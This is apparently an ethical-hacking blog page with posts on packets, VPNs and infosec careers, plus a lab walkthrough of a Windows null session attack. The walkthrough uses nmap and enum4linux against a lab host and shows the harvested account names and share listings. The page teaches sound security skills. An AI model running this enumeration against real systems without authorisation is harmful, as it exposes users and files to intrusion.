
OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security, just need to understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, like mindset and goal.


Showing posts with label penetration testing. Show all posts
  • Study About Networking Protocols and Packets with working process

     


    In a computer network, machines communicate with each other by means of protocols.

    These protocols ensure that computers with different hardware and software can communicate. Many different protocols are in use on the Internet, and each has its own purpose.

    What is the primary goal of networking? It is to exchange information between computers on a network, and that information is carried by packets.



    Packets


    Packets are streams of bits used for data transmission over a physical medium as electrical signals; the medium can be a wire in a LAN (local area network) or the air in a Wi-Fi network.

    These electrical signals are then interpreted as bits (zeros and ones) that make up the information. Every packet in every protocol has the following structure.


    [Figure: packet structure, a header followed by a payload]



    The header has a protocol-specific structure. This ensures that the receiving host can properly interpret the payload and handle the entire communication.





    The payload is the actual information being carried, so it could be, for example, part of an email message or the content of a file during a download.



    Example: the IP header


    For example, the Internet Protocol header is at least 160 bits (20 bytes) long, and it includes the information needed to interpret the content of the IP packet.


    [Figure: IPv4 header layout. Pic credit: INE]



    The first four bits identify the Internet Protocol (IP) version; today they represent either IP version 4 or IP version 6.






    The 32 bits starting at position 96 represent the source address.








    The following four bytes (32 bits) represent the destination address.






    Using the information in the header, the nodes involved in the communication can understand and use IP packets.
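    To make the bit positions above concrete, here is an added example (not code from the original post) that decodes a 20-byte IPv4 header exactly as described: the version in the first four bits, the source address in the 32 bits starting at bit 96, the destination address in the following four bytes. It also performs the checks a receiving host must make before trusting the header (version, IHL consistent with the data, RFC 791 header checksum). The sample header bytes are constructed for this example; the addresses are the ones used later on this page.

```python
import struct
import ipaddress

# Constructed sample: a 20-byte IPv4 header (IHL=5, no options) for a TCP
# segment from 192.168.99.101 to 192.168.99.162. The checksum field (bytes
# 10-11) is left zero so that with_checksum() below can fill it in.
SAMPLE_HEADER = bytes([
    0x45, 0x00, 0x00, 0x3c,   # version=4, IHL=5, DSCP/ECN=0, total length=60
    0x1c, 0x46, 0x40, 0x00,   # identification=0x1c46, flags=DF, fragment offset=0
    0x40, 0x06, 0x00, 0x00,   # TTL=64, protocol=6 (TCP), header checksum=0
    192, 168, 99, 101,        # source address: the 32 bits starting at bit 96
    192, 168, 99, 162,        # destination address: the following 4 bytes
])

IPV4_MIN_HEADER = 20  # 160 bits


def field_bits(header: bytes, start_bit: int, nbits: int) -> int:
    """Read nbits starting at bit position start_bit, counting from the first bit sent."""
    total_bits = len(header) * 8
    if start_bit + nbits > total_bits:
        raise ValueError("field lies outside the header")
    value = int.from_bytes(header, "big")
    return (value >> (total_bits - start_bit - nbits)) & ((1 << nbits) - 1)


def compute_checksum(header: bytes) -> int:
    """RFC 791 checksum: ones'-complement of the ones'-complement sum of all
    16-bit words of the header, with the checksum field itself taken as zero."""
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    if len(zeroed) % 2:
        zeroed += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(zeroed) // 2), zeroed))
    while total >> 16:                       # end-around carry
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def checksum_ok(header: bytes) -> bool:
    """True when the stored checksum matches the recomputed one."""
    stored = struct.unpack("!H", header[10:12])[0]
    return stored == compute_checksum(header)


def with_checksum(header: bytes) -> bytes:
    """Copy of header with a valid checksum written into bytes 10-11."""
    return header[:10] + struct.pack("!H", compute_checksum(header)) + header[12:]


def parse_ipv4_header(data: bytes) -> dict:
    """Decode the fixed IPv4 header fields, validating what a receiving host
    has to check before it can trust the rest of the packet."""
    if len(data) < IPV4_MIN_HEADER:
        raise ValueError("IPv4 header is at least 20 bytes (160 bits)")
    version = field_bits(data, 0, 4)         # first four bits: IP version
    if version != 4:
        raise ValueError("not IPv4 (version field = %d)" % version)
    ihl = field_bits(data, 4, 4)             # header length in 32-bit words
    header_len = ihl * 4
    if header_len < IPV4_MIN_HEADER or header_len > len(data):
        raise ValueError("IHL %d inconsistent with data length" % ihl)
    header = data[:header_len]
    total_length, ident, flags_frag, ttl, proto, checksum = struct.unpack(
        "!HHHBBH", header[2:12])
    if total_length < header_len:
        raise ValueError("total length smaller than header length")
    return {
        "version": version,
        "header_len": header_len,
        "total_length": total_length,
        "identification": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "fragment_offset": flags_frag & 0x1FFF,
        "ttl": ttl,
        "protocol": proto,
        "checksum": checksum,
        "checksum_ok": checksum_ok(header),
        "src": str(ipaddress.IPv4Address(field_bits(header, 96, 32))),
        "dst": str(ipaddress.IPv4Address(field_bits(header, 128, 32))),
        "options": header[IPV4_MIN_HEADER:],
    }


if __name__ == "__main__":
    packet = with_checksum(SAMPLE_HEADER)
    for key, value in parse_ipv4_header(packet).items():
        print("%-16s %s" % (key, value))
```

    Note that `field_bits` counts positions from the first bit on the wire, so the offsets 0, 96 and 128 used in the post work unchanged even when the header carries options and is longer than 20 bytes.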






    Protocol layers


    There are many protocols out there, each for a specific purpose, such as:

    # Transmitting data.
    # Identifying computers on a network.
    # Exchanging emails and files, or performing VoIP calls.
    # Establishing a communication between a server and a client.




    Instead of using specific examples, let's focus on the features that a protocol provides:


    # Use the physical media to send packets.
    # Identify hosts.
    # Make an application (email client, FTP, browser, ...) work.
    # Transport data between processes (the server and the client programs).




    Moreover, we can rewrite the list again as:

    # Application Layer
    # Transport Layer
    # Network Layer
    # Physical Layer



    These layers work on top of one another, and every layer has its own protocols.


    For example, a few application layer protocols are the Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Post Office Protocol (POP), Simple Mail Transfer Protocol (SMTP), and Domain Name System (DNS).

    The application layer does not need to know how to identify a process on a host, how to reach it, or how to use the copper wire to establish a communication. It just uses its underlying layers.




    The OSI Model


    The OSI (Open Systems Interconnection) model is a standardised model which we use to demonstrate the theory behind computer networking. In practice, real-world networking is based on the more compact TCP/IP model; however, the OSI model is, in many ways, easier to get an initial understanding from.




    There are many mnemonics floating around to help you learn the layers of the OSI model; search around until you find one that you like.






    Encapsulation


    So let's see how the protocols work with each other. If each protocol has a header and a payload, how can a protocol use the lower layers?

    The entire upper-layer protocol packet (header and payload) is the payload of the lower one; this is called encapsulation.
    TCP/IP is the real-world implementation of a networking stack and is the protocol stack used on the Internet.


    The TCP/IP model is, in many ways, very similar to the OSI model. It is a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI model.
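    The following is an added example, not code from the original post, showing encapsulation in working code: each layer prepends its own header to whatever it receives, so the complete upper-layer packet becomes the lower layer's payload, and the receiving side peels the headers off in the opposite order. The four-byte-tag-plus-length header format and the layer names are constructed for this illustration; real protocols use the layouts defined in their RFCs.

```python
import struct

# Illustrative header: a 4-byte layer tag followed by a 16-bit payload length.
# This format is constructed for the example and is not any real protocol's.
HEADER_FMT = "!4sH"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 6 bytes

# A simplified TCP/IP-style stack, listed from the top (application) down.
STACK = [b"HTTP", b"TCP ", b"IPv4", b"ETH "]


def encapsulate(layers, app_data: bytes) -> bytes:
    """Wrap app_data once per layer; the bottom-most layer ends up outermost.

    The whole upper-layer packet (header + payload) is handed down as the
    payload of the layer below: that is what encapsulation means.
    """
    packet = app_data
    for tag in layers:                       # HTTP first, ETH last (outermost)
        if len(packet) > 0xFFFF:
            raise ValueError("payload too large for the 16-bit length field")
        packet = struct.pack(HEADER_FMT, tag, len(packet)) + packet
    return packet


def decapsulate(packet: bytes, layers):
    """Peel headers from the outside in and return ([(tag, payload_len), ...], app_data).

    Like a receiving host, the caller supplies the stack it expects; each layer
    validates only its own header and passes the remainder upward.
    """
    rest = packet
    seen = []
    for expected in reversed(layers):        # ETH first (outermost), HTTP last
        if len(rest) < HEADER_LEN:
            raise ValueError("truncated packet while expecting %r header" % expected)
        tag, length = struct.unpack(HEADER_FMT, rest[:HEADER_LEN])
        body = rest[HEADER_LEN:]
        if tag != expected:
            raise ValueError("expected %r header, found %r" % (expected, tag))
        if length != len(body):
            raise ValueError("%r header claims %d payload bytes, got %d"
                             % (tag, length, len(body)))
        seen.append((tag, length))
        rest = body
    return seen, rest


if __name__ == "__main__":
    # Constructed application-layer data (an HTTP request line and headers).
    request = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
    frame = encapsulate(STACK, request)
    print("on the wire:", frame.hex())
    for tag, length in decapsulate(frame, STACK)[0]:
        print("%s header -> %d payload bytes" % (tag.decode().strip(), length))
```

    Running it shows that the application data comes back unchanged after four headers have been stripped, and that a frame cut short by one byte is rejected at the outermost layer because its length field no longer matches the payload, which is the kind of consistency check every real layer performs.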





    You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real world. The answer is quite simply that the OSI model (being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.






    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
      



  • About Cryptography and VPNs

     



    A clear text protocol handles data over a network without any transformation or encryption. An attacker can eavesdrop on the communication, performing an attack the protocol does nothing to prevent.
     

     



    Because the data is written in human-readable form, the traffic of a clear text protocol can be intercepted, eavesdropped on and mangled very easily: the data being transmitted is not encrypted, whether it travels on a public or a private network. If there is absolutely no alternative to a clear text protocol, you should use it only on a trusted network.


    A cryptographic protocol provides its services by encrypting the data sent over a network. Cryptographic protocols have many different goals; one of them is to prevent eavesdropping.

    Eavesdropping, also known as a sniffing or snooping attack, is the theft of information as it is transmitted over the network by a computer, smartphone or another connected device: the attacker takes advantage of unsecured network communications to access data as it is being sent or received by its user.


    If an attacker intercepts encrypted traffic, they will not be able to understand it.
     

     

    About Cryptography and VPNs

     


    If you need to transmit private information such as a username and password, you should always use a cryptographic protocol, which secures the communication over the network.

    What if you need to run a clear text protocol on an untrusted network?

    You can wrap (tunnel) a clear text protocol into a cryptographic one.





    A great example of protocol tunneling is a VPN.

    A Virtual Private Network (VPN) uses cryptography to extend a private network over a public one, like the Internet. The extension is made by establishing a protected connection to the private network (such as your office or home network). From the client's point of view, being on the VPN is the same as being directly connected to the private network.



     

     

  • Information Security Field

     

     



    There is a deep well of information security knowledge, because there are people in the world who prefer not just to use computers but to understand how they work and in what ways their security can be broken.

    The term hacker was born in the sixties in the MIT community. Such people are recognisable by their inner curiosity, high intelligence and strong motivation.


    The world of infosec is made of hackers who keep their curiosity about computer systems alive, bypass restrictions in new ways (even those set by software vendors and programmers), and understand the security pitfalls of any kind of implementation.


    Being able to attack also means having an in-depth understanding of the techniques and workings of the target system. To be a hacker means having the hunger that is present in successful hackers today. Hackers explore and improve their skills daily.

    There is always something new to learn, something interesting to try, something exciting to study.

    NOTE: The history of hacking could be a complete book in itself.

    If you search the word hacking on the Internet, you will get results on every aspect of the world of hacking.

    Hacking is more of an approach or a lifestyle, applied to telephone lines, people and software development.


    Becoming an information security professional means acquiring the knowledge of hacking with honesty, and never stopping challenging yourself and your colleagues.


    Nowadays big companies and governments store and process all kinds of confidential data using advanced technology on computers and mobile devices.

    The data is not only stored but also has to be transmitted from private networks to public networks or to other computers, so it is a must to protect sensitive information. Companies pay a premium to safeguard their data and ensure that their systems are protected, or at least they should.





    Career opportunities


    An even more important sector is national cyber security. Recently governments have had to face a broad range of cyber threats: global cyber syndicates, hackers for hire, activists, terrorists and state-sponsored hackers.

    With critical infrastructure like power plants, trains, aeroplanes or dams being controlled by computers, using hacking skills for good has become critical for the safety of nations.

    Companies and governments need to implement hardware and software defense systems to protect their digital assets.



    At the same time, they are required to train every single employee in the organization so that:

    # Secure applications are developed,
    # Proper defensive measures are taken, and
    # Proper use of the company's data is in place.



    IT security is a very difficult game. One way to ensure that a system is secure from cyber threats is by hiring a penetration tester.



    Penetration testers, also known as pentesters, are professionals who are hired to simulate a hacking attack against a network, a computer system, a web application or an entire organisation.

    They master the same tools and techniques that malicious hackers use, in order to discover any and all vulnerabilities in the systems they test.








    These highly skilled professionals often work:

    # As freelancers,
    # In an IT security services company,
    # From home.


    Moreover, as IT is a broad knowledge domain, they can specialize in specific infosec sectors such as:

    # System attacks
    # Web application attacks
    # Malware analysis
    # Reverse engineering
    # Android applications
    # Others


    Passion, skill and a hunger for knowledge are essential for a successful pentesting career.





    Information Security Terms

    Speaking the domain language is fundamental in any field; it helps you to better understand the industry and better communicate with your colleagues.

     


     

    Root or Administrator

    The root or Administrator users are the users who manage IT networks or single systems. They have the maximum privileges over a system.


     

    Privileges

    In a computer system, privileges identify the actions that a user is allowed to perform. The higher the privileges, the more control over a system a user has. Privilege escalation is an attack where a malicious user gains elevated privileges over a system.


     


     

     

    Remote Code Execution


    During a remote code execution attack a malicious user manages to execute attacker-controlled code on a remote victim machine. A remote code execution vulnerability is very dangerous because it can be exploited over the network by a remote attacker.

     


     

     

    ShellCode


    Shellcode is a piece of custom code which provides the attacker with a shell on the victim machine. Shellcode is generally used during remote code execution attacks.

     

     



  • Eliminate Your Fears And Doubts About Null Session Attack

     


     

     

    The final goal of this post is to show you how to retrieve information from the target machine, such as shares, users, groups and so on. Moreover, by navigating the remote machine, you should be able to find a file named "Congratulations.txt". Download it and explore its content.



    A Windows machine can share a file or a directory on the network; this lets local and remote users access the resource and, possibly, modify it.


    Example


    A file server in an office lets users open and edit the documents of their own department, while it lets everyone read, but not modify, public information files.

    This feature is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company. Shares can be either extremely useful if used properly or extremely dangerous when configured improperly. Creating network shares in a Windows-based environment is fairly easy: generally users just need to turn on the File and Printer Sharing service and then they can start sharing directories or files.

    Users can also set permissions on a share, choosing who can perform operations such as reading, writing and modifying permissions. In Windows, users can choose to share a single file or use the Public directory. When sharing a single file they can choose the local or remote users to share the file with. When using the Public directory they can choose which local users can access the files on the share, but for the network they can only allow everyone or no one to access the share.




    An authorised user can access a share by using a Universal Naming Convention path (UNC path).


    The format of a UNC path is:

    \\ServerName\ShareName\file.nat



    Administrative shares


    There are also some special default administrative shares which are used by system administrators and Windows itself:

    \\ComputerName\C$ lets an administrator access a volume on the local machine. Every volume has a share (C$, D$, E$, etc.).

    \\ComputerName\admin$ points to the Windows installation directory.

    \\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via Windows Explorer.



    You can test the volume shares and the admin$ share on your computer by entering the following in the Windows Explorer address bar:


    \\localhost\<sharename>

    \\localhost\d$

     

     


    Null session attacks can be used to enumerate a lot of information. Attackers can steal information about:


    # Passwords
    # System users
    # System groups
    # Running system processes


    Null sessions are remotely exploitable; this means that attackers can use their computers to attack a vulnerable Windows machine. Moreover, they can be used to call remote APIs and remote procedure calls. Because of these factors, null session attacks have had a huge impact on the Windows ecosystem.

    Nowadays Windows is configured to be immune to this kind of attack. However, legacy hosts can still be vulnerable.

    A null session is a vulnerability of Windows administrative shares: it lets an attacker connect to a local or remote share without authentication.

    We will go through the enumeration of Windows shares and their exploitation by using various techniques and tools.




    Tools


    The best tools for this lab are:

    # enum4linux
    # samrdump
    # smbclient



    Steps


    # Find a target in the network
    # Check for null session
    # Exploit null session

    It's time to get our hands dirty.



    # Gather information with enum4linux

    Use enum4linux and gather the following information:

    # Shares
    # Users
    # Password policies
    # Groups



    Use smbclient to navigate the target machine

    Mount the share, or use the smbclient interactive command line, in order to navigate the remote machine and find and inspect the content of the Congratulations.txt file.



    Find a target in the network


    We first need to verify which network the target is on. We can do it by running ifconfig and checking the IP address of our tap0 interface.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ifconfig
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 2201  bytes 96326 (94.0 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 2201  bytes 96326 (94.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
            inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
            ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
            RX packets 3  bytes 363 (363.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 522  bytes 22356 (21.8 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
            inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 92211  bytes 102634365 (97.8 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 55571  bytes 9521350 (9.0 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    



    As we can see the target network is 192.168.99.0/24 (note that your IP address may be different from the one in the previous screenshot). Let's run nmap in order to discover live hosts on the network:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sn 192.168.99.0/24
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
    Nmap scan report for 192.168.99.162
    Host is up (0.53s latency).
    MAC Address: 00:50:56:A5:DF:D7 (VMware)
    Nmap scan report for 192.168.99.101
    Host is up.
    Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    




    The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).


    Check for null session


    Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.99.162
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ====================================================== 
    |    Enumerating Workgroup/Domain on 192.168.99.162    |
     ====================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================== 
    |    Nbtstat Information for 192.168.99.162    |
     ============================================== 
    Looking up status of 192.168.99.162
            ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
            WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
            WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
            WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
            ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    
            MAC Address = 00-50-56-A5-DF-D7
    
     ======================================= 
    |    Session Check on 192.168.99.162    |
     ======================================= 
    [+] Server 192.168.99.162 allows sessions using username '', password ''
    
     ============================================= 
    |    Getting domain SID for 192.168.99.162    |
     ============================================= 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    enum4linux complete on Sun Dec 26 21:03:38 2021
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    



    We can see that the File Server Service is active and the string <20> appears in the list.
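    Reading enum4linux output by eye works for one host; across a whole legacy estate it is easier to parse it. The following is an added example, not code from the original post or from enum4linux, that triages the tool's text output the way a defender auditing their own hosts would: it flags the "allows sessions using username '', password ''" line, notes the <20> File Server Service record, collects the user:[...] rid:[...] lines, the share table and the share-mapping results, and turns them into findings. The sample output is constructed for this example in the same format enum4linux prints (the values mirror the lab host above); the regular expressions assume that format.

```python
import re

# Constructed sample in enum4linux's output format (values mirror the lab
# host above but are embedded here so the script runs offline).
SAMPLE_OUTPUT = """\
[+] Got domain/workgroup name: WORKGROUP
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
[+] Server 192.168.99.162 allows sessions using username '', password ''
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[netadmin] rid:[0x3ec]
        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       Remote IPC
        WorkSharing     Disk
        C$              Disk      Default share
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/WorkSharing    Mapping: OK     Listing: OK
//192.168.99.162/C$     Mapping: DENIED Listing: N/A
"""

NULL_SESSION_RE = re.compile(r"Server (\S+) allows sessions using username '', password ''")
NBT_RE = re.compile(r"^\s*(\S+)\s+<([0-9a-f]{2})>\s+-\s+(?:<GROUP>\s+)?\w\s+<ACTIVE>\s+(.+?)\s*$")
USER_RE = re.compile(r"^user:\[([^\]]+)\] rid:\[(0x[0-9a-f]+)\]")
SHARE_RE = re.compile(r"^\s+(.+?)\s+(Disk|IPC|Printer)\s*(.*)$")
MAP_RE = re.compile(r"^//(\S+)/(\S+)\s+Mapping:\s+(\S+)\s+Listing:\s+(\S+)")


def triage(text: str) -> dict:
    """Extract the security-relevant facts from one enum4linux run."""
    report = {"host": None, "null_session": False, "file_server_service": False,
              "users": [], "shares": {}, "listable_anonymously": []}
    for line in text.splitlines():
        m = NULL_SESSION_RE.search(line)
        if m:                                   # the session check succeeded
            report["host"] = m.group(1)
            report["null_session"] = True
            continue
        m = NBT_RE.match(line)
        if m:                                   # NetBIOS name table entry
            if m.group(2) == "20":              # <20> = File Server Service
                report["file_server_service"] = True
            continue
        m = USER_RE.match(line)
        if m:                                   # account name and RID
            report["users"].append((m.group(1), int(m.group(2), 16)))
            continue
        m = MAP_RE.match(line)
        if m:                                   # result of mapping each share
            _host, share, _mapping, listing = m.groups()
            if listing == "OK":
                report["listable_anonymously"].append(share)
            continue
        m = SHARE_RE.match(line)
        if m:                                   # row of the share table
            report["shares"][m.group(1)] = m.group(2)
    return report


def findings(report: dict) -> list:
    """Turn the parsed facts into remediation-oriented findings."""
    notes = []
    if report["null_session"]:
        notes.append("null session accepted by %s: anonymous clients can connect to IPC$ "
                     "without credentials; restrict anonymous access or retire this legacy host"
                     % report["host"])
    if report["users"]:
        notes.append("%d account names disclosed: %s" % (
            len(report["users"]), ", ".join(name for name, _ in report["users"])))
    if report["listable_anonymously"]:
        notes.append("shares listable without credentials: %s"
                     % ", ".join(report["listable_anonymously"]))
    if report["file_server_service"] and not report["null_session"]:
        notes.append("file server service (<20>) advertised but no null session: "
                     "host is reachable over SMB yet not anonymously enumerable")
    return notes


if __name__ == "__main__":
    result = triage(SAMPLE_OUTPUT)
    for note in findings(result):
        print("-", note)
```

    The share-table regex keys on the Type column, so share names containing spaces (such as "My Documents" in the listing above) are captured correctly; lines that are not in one of the recognised formats are simply ignored, which keeps the parser safe to run over the tool's full, noisy output.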



    Exploit null session

    It is time to get our hands dirty!



    Gather information with enum4linux

    Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ enum4linux -a 192.168.99.162
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.99.162
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ====================================================== 
    |    Enumerating Workgroup/Domain on 192.168.99.162    |
     ====================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================== 
    |    Nbtstat Information for 192.168.99.162    |
     ============================================== 
    Looking up status of 192.168.99.162
            ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
            WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
            WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
            WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
            ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    
            MAC Address = 00-50-56-A5-DF-D7
    
     ======================================= 
    |    Session Check on 192.168.99.162    |
     ======================================= 
    [+] Server 192.168.99.162 allows sessions using username '', password ''
    
     ============================================= 
    |    Getting domain SID for 192.168.99.162    |
     ============================================= 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    
     ======================================== 
    |    OS information on 192.168.99.162    |
     ======================================== 
    Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
    [+] Got OS info for 192.168.99.162 from smbclient: 
    [+] Got OS info for 192.168.99.162 from srvinfo:
            192.168.99.162 Wk Sv NT PtB LMB     
            platform_id     :       500
            os version      :       5.1
            server type     :       0x51003
    
     =============================== 
    |    Users on 192.168.99.162    |
     =============================== 
    index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
    index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
    index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
    index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
    index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
    index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
    index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service
    
    user:[Administrator] rid:[0x1f4]
    user:[eLS] rid:[0x3eb]
    user:[Frank] rid:[0x3ed]
    user:[Guest] rid:[0x1f5]
    user:[HelpAssistant] rid:[0x3e8]
    user:[netadmin] rid:[0x3ec]
    user:[SUPPORT_388945a0] rid:[0x3ea]
    
     =========================================== 
    |    Share Enumeration on 192.168.99.162    |
     =========================================== 
    
            Sharename       Type      Comment
            ---------       ----      -------
            My Documents    Disk      
            IPC$            IPC       Remote IPC
            Frank           Disk      
            C               Disk      
            WorkSharing     Disk      
            FrankDocs       Disk      
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
    Reconnecting with SMB1 for workgroup listing.
    
            Server               Comment
            ---------            -------
    
            Workgroup            Master
            ---------            -------
    
    [+] Attempting to map shares on 192.168.99.162
    //192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
    //192.168.99.162/Frank  Mapping: OK     Listing: DENIED
    //192.168.99.162/C      [E] Can't understand response:
      AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
      boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
      CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
      Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
      IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
      MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
      NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
      ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
      pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
      Program Files                      DR        0  Mon Oct  3 21:40:27 2016
      System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
      WINDOWS                             D        0  Mon Oct  3 21:42:49 2016
    
                    785224 blocks of size 4096. 345608 blocks available
    //192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
    //192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
    //192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
    //192.168.99.162/C$     Mapping: DENIED, Listing: N/A
    
     ====================================================== 
    |    Password Policy Information for 192.168.99.162    |
     ====================================================== 
    
    
    [+] Attaching to 192.168.99.162 using a NULL share
    
    [+] Trying protocol 139/SMB...
    
            [!] Protocol failed: Cannot request session (Called Name:192.168.99.162)
    
    [+] Trying protocol 445/SMB...
    
    [+] Found domain(s):
    
            [+] ELS-WINXP
